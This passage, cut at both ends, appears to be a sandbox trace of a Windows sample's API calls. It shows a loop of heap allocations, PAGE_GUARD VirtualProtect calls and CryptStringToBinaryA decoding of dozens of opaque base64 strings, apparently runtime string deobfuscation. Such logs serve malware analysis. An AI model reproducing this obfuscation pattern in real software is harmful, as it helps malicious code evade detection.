pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c89d0 [0181.225] VirtualProtect (in: lpAddress=0x5c89d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5c3368 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+kCyFSOBD3aMXY", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+kCyFSOBD3aMXY", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c87a0 [0181.225] VirtualProtect (in: lpAddress=0x5c87a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5c3350 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+iCTtMODT3aczlLj40OQ==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] CryptStringToBinaryA (in: pszString="SBSETu+iCTtMODT3aczlLj40OQ==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.225] GetProcessHeap () returned 0x5b0000 [0181.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9a38 [0181.226] VirtualProtect (in: lpAddress=0x5c9a38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.226] GetProcessHeap () returned 0x5b0000 [0181.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5c5aa8 [0181.226] CryptStringToBinaryA (in: pszString="SBSETu+gAjpoKSP7SsDCYg==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.226] CryptStringToBinaryA (in: pszString="SBSETu+gAjpoKSP7SsDCYg==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.226] GetProcessHeap () returned 0x5b0000 [0181.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8570 [0181.226] VirtualProtect (in: lpAddress=0x5c8570, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.226] GetProcessHeap () returned 0x5b0000 [0181.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5b48 [0181.226] CryptStringToBinaryA (in: pszString="SBSETu+gAjpoKSP7SsDCbQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.226] CryptStringToBinaryA (in: pszString="SBSETu+gAjpoKSP7SsDCbQ==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.226] GetProcessHeap () returned 0x5b0000 [0181.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8ae8 [0181.226] VirtualProtect (in: lpAddress=0x5c8ae8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.226] GetProcessHeap () returned 0x5b0000 [0181.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5ac8 [0181.227] CryptStringToBinaryA (in: pszString="SBSETu+hFStE", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.227] CryptStringToBinaryA (in: pszString="SBSETu+hFStE", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.227] GetProcessHeap () returned 0x5b0000 [0181.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7cb0 [0181.227] VirtualProtect (in: lpAddress=0x5c7cb0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.227] GetProcessHeap () returned 0x5b0000 [0181.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5ca078 [0181.227] CryptStringToBinaryA (in: pszString="TQGDYfaXJA8=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.227] CryptStringToBinaryA (in: pszString="TQGDYfaXJA8=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.227] GetProcessHeap () returned 0x5b0000 [0181.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9b50 [0181.227] VirtualProtect (in: lpAddress=0x5c9b50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.227] GetProcessHeap () returned 0x5b0000 [0181.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5ca000 [0181.228] CryptStringToBinaryA (in: pszString="TQGDce+VJg==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] CryptStringToBinaryA (in: pszString="TQGDce+VJg==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] GetProcessHeap () returned 0x5b0000 [0181.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9178 [0181.228] VirtualProtect (in: lpAddress=0x5c9178, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.228] GetProcessHeap () returned 0x5b0000 [0181.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5beed0 [0181.228] CryptStringToBinaryA (in: pszString="ThSFStaGEy1JDjbzfug=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] CryptStringToBinaryA (in: pszString="ThSFStaGEy1JDjbzfug=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] GetProcessHeap () returned 0x5b0000 [0181.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8c00 [0181.228] VirtualProtect (in: lpAddress=0x5c8c00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.228] GetProcessHeap () returned 0x5b0000 [0181.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5ca0a8 [0181.228] CryptStringToBinaryA (in: pszString="TT22R++hCCJFODTGfN3EGw==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] CryptStringToBinaryA (in: pszString="TT22R++hCCJFODTGfN3EGw==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.228] GetProcessHeap () returned 0x5b0000 [0181.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c88b8 [0181.228] VirtualProtect (in: lpAddress=0x5c88b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.229] GetProcessHeap () returned 0x5b0000 [0181.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5ae8 [0181.229] CryptStringToBinaryA (in: pszString="TR2UTveiHytCKDLzWNHt", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.229] CryptStringToBinaryA (in: pszString="TR2UTveiHytCKDLzWNHt", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.229] GetProcessHeap () returned 0x5b0000 [0181.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c93a8 [0181.229] VirtualProtect (in: lpAddress=0x5c93a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.229] GetProcessHeap () returned 0x5b0000 [0181.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5c9fe8 [0181.229] CryptStringToBinaryA (in: pszString="WRGYUtyCEwdMPCHzWMfPNT88OMj+3RPR", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.229] CryptStringToBinaryA (in: pszString="WRGYUtyCEwdMPCHzWMfPNT88OMj+3RPR", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.229] GetProcessHeap () returned 0x5b0000 [0181.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7dc8 [0181.229] VirtualProtect (in: lpAddress=0x5c7dc8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.230] GetProcessHeap () returned 0x5b0000 [0181.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x19) returned 0x5ca0c0 [0181.230] CryptStringToBinaryA (in: pszString="WRGYUtyCEwdMPCHzWMfPNT88OMg=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.230] CryptStringToBinaryA (in: pszString="WRGYUtyCEwdMPCHzWMfPNT88OMg=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.230] GetProcessHeap () returned 0x5b0000 [0181.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7ff8 [0181.230] VirtualProtect (in: lpAddress=0x5c7ff8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.230] GetProcessHeap () returned 0x5b0000 [0181.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5c5b08 [0181.230] CryptStringToBinaryA (in: pszString="WRGYUtiVAi9VOAT/acTNKh0rJdbl9iDgXsVF", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.230] CryptStringToBinaryA (in: pszString="WRGYUtiVAi9VOAT/acTNKh0rJdbl9iDgXsVF", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.230] GetProcessHeap () returned 0x5b0000 [0181.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9808 [0181.230] VirtualProtect (in: lpAddress=0x5c9808, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.231] GetProcessHeap () returned 0x5b0000 [0181.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5ca0e8 [0181.231] CryptStringToBinaryA (in: pszString="WRGYUveSFB1VPDTiaNk=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.231] CryptStringToBinaryA (in: pszString="WRGYUveSFB1VPDTiaNk=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.231] GetProcessHeap () returned 0x5b0000 [0181.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8d18 [0181.231] VirtualProtect (in: lpAddress=0x5c8d18, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.231] GetProcessHeap () returned 0x5b0000 [0181.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5ca018 [0181.231] CryptStringToBinaryA (in: pszString="WRGYUveSFB1JKDLyct7C", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.231] CryptStringToBinaryA (in: pszString="WRGYUveSFB1JKDLyct7C", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.231] GetProcessHeap () returned 0x5b0000 [0181.231] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9290 [0181.231] VirtualProtect (in: lpAddress=0x5c9290, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.232] GetProcessHeap () returned 0x5b0000 [0181.232] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5ca030 [0181.232] CryptStringToBinaryA (in: pszString="WRGYUsiGEStoMCfxeP3DCS8rL9rA", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.232] CryptStringToBinaryA (in: pszString="WRGYUsiGEStoMCfxeP3DCS8rL9rA", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.232] GetProcessHeap () returned 0x5b0000 [0181.232] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8e30 [0181.232] VirtualProtect (in: lpAddress=0x5c8e30, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.232] GetProcessHeap () returned 0x5b0000 [0181.232] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5c5848 [0181.232] CryptStringToBinaryA (in: pszString="WRGYUt+OFD5OLiPfcMjLPw==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.232] CryptStringToBinaryA (in: pszString="WRGYUt+OFD5OLiPfcMjLPw==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.232] GetProcessHeap () returned 0x5b0000 [0181.232] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c94c0 [0181.232] VirtualProtect (in: lpAddress=0x5c94c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.232] GetProcessHeap () returned 0x5b0000 [0181.232] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5b28 [0181.232] CryptStringToBinaryA (in: pszString="WRGYUt2VAis=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] CryptStringToBinaryA (in: pszString="WRGYUt2VAis=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] GetProcessHeap () returned 0x5b0000 [0181.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c7ee0 [0181.233] VirtualProtect (in: lpAddress=0x5c7ee0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.233] GetProcessHeap () returned 0x5b0000 [0181.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5ca048 [0181.233] CryptStringToBinaryA (in: pszString="XQeUQ++CNDpTOCf7UsfkHTc2KNrB", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] CryptStringToBinaryA (in: pszString="XQeUQ++CNDpTOCf7UsfkHTc2KNrB", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] GetProcessHeap () returned 0x5b0000 [0181.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8110 [0181.233] VirtualProtect (in: lpAddress=0x5c8110, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.233] GetProcessHeap () returned 0x5b0000 [0181.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x16) returned 0x5c5b68 [0181.233] CryptStringToBinaryA (in: pszString="WRCFatyLCCxAMUbkcsT/Lik8K9Y=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] CryptStringToBinaryA (in: pszString="WRCFatyLCCxAMUbkcsT/Lik8K9Y=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.233] GetProcessHeap () returned 0x5b0000 [0181.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8f48 [0181.233] VirtualProtect (in: lpAddress=0x5c8f48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.234] GetProcessHeap () returned 0x5b0000 [0181.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5c5828 [0181.234] CryptStringToBinaryA (in: pszString="VjCwZg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.234] CryptStringToBinaryA (in: pszString="VjCwZg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.234] GetProcessHeap () returned 0x5b0000 [0181.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c96f0 [0181.234] VirtualProtect (in: lpAddress=0x5c96f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.234] GetProcessHeap () returned 0x5b0000 [0181.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5beec0 [0181.234] CryptStringToBinaryA (in: pszString="ViGlcrTWSX8=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.234] CryptStringToBinaryA (in: pszString="ViGlcrTWSX8=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.234] GetProcessHeap () returned 0x5b0000 [0181.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c9060 [0181.234] VirtualProtect (in: lpAddress=0x5c9060, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.234] GetProcessHeap () returned 0x5b0000 [0181.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5ca060 [0181.235] CryptStringToBinaryA (in: pszString="WTCl", cchString=0x4, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] CryptStringToBinaryA (in: pszString="WTCl", cchString=0x4, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] GetProcessHeap () returned 0x5b0000 [0181.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8228 [0181.235] VirtualProtect (in: lpAddress=0x5c8228, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.235] GetProcessHeap () returned 0x5b0000 [0181.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5bef50 [0181.235] CryptStringToBinaryA (in: pszString="Tjqidg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] CryptStringToBinaryA (in: pszString="Tjqidg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] GetProcessHeap () returned 0x5b0000 [0181.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c95d8 [0181.235] VirtualProtect (in: lpAddress=0x5c95d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.235] GetProcessHeap () returned 0x5b0000 [0181.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5bed80 [0181.235] CryptStringToBinaryA (in: pszString="eBydRw==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] CryptStringToBinaryA (in: pszString="eBydRw==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.235] GetProcessHeap () returned 0x5b0000 [0181.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8340 [0181.236] VirtualProtect (in: lpAddress=0x5c8340, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.236] GetProcessHeap () returned 0x5b0000 [0181.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5beee0 [0181.236] CryptStringToBinaryA (in: 